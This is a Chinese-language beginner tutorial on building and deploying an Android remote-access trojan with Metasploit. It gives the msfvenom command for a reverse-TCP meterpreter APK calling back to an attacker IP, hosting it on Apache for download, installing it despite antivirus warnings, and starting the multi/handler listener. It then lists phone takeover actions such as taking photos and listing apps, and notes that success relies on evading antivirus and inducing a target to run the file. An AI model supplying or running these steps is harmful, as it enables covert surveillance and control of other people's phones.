工具简介:
msf全称Metasploit是H.D. Moore在2003年开发的,它是少数几个可用于执行诸多渗透测试步骤的工具。在发现新漏洞时(这是很常见的),Metasploit会监控Rapid7,然后Metasploit的200,000多个用户会将漏洞添加到Metasploit的目录上。然后,任何人只要使用Metasploit,就可以用它来测试特定系统的是否有这个漏洞。
通俗来说msf就是一个渗透的工具包,初学者可以从kali开始了解,因为kali的工具含量对于初学者来讲,还是比较广的,给我们去了解渗透工作,足够。
作者环境:
kali2020:版本没啥说的,至少用跟你现在电脑兼容的吧,下载链接已奉上
局域网:kali的网卡与主机网卡要共享,并且主机与目标机在同一个局域网内
下面开始操作:
生成监听木马
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.5.100 LPORT=5000 R > test.apk # msf的模块 kali的ip kali的端口 生成文件
注意我们代码此时的路径在/home/lqx/桌面,这样我们生成的文件可以在桌面直接看到
将木马下载到手机
通过kali的apache服务将文件上传至服务器,而手机则通过kali的ip地址登陆服务器并下载木马。
/etc/init.d/apache2 start #开启apache服务
将刚刚生成的文件移动到/etc/www/html目录下,并删除此路径下的index.html文件
mv test.apk /var/www/html #将test.apk文件移动到/var/www/html路径下 cd /var/www/html #切换窗口的操作路径 rm index.html #删除index.html文件
我们在浏览器输入kali的ip地址并下载测试用的木马文件
因为没有做防杀,所以立刻就被系统检测,不用担心我们“继续安装”。
安装完成后,我们直接运行它。因为生成的是纯木马文件没有任何伪装,运行了也不会有‘任何效果’。
开启msf
msfconsole #开启msf
配置参数
成功建立会话后进入meterpreter
use multi/handler set payload android/meterpreter/reverse_tcp set LHOST 192.168.5.100 #kali的ip set LPORT 5000 #kali的端口 #与前面配置木马时的host、port参数一致 run #开始监听
测试渗透结果:
其实到这里我们就已经成功了,接下里我们可以在kali上对手机进行,拍照,查看app,等不可描述的操作,究其原理就是木马够接地气不被杀毒软件检测,其次诱导目标运行。
app_list #查看手机安装的app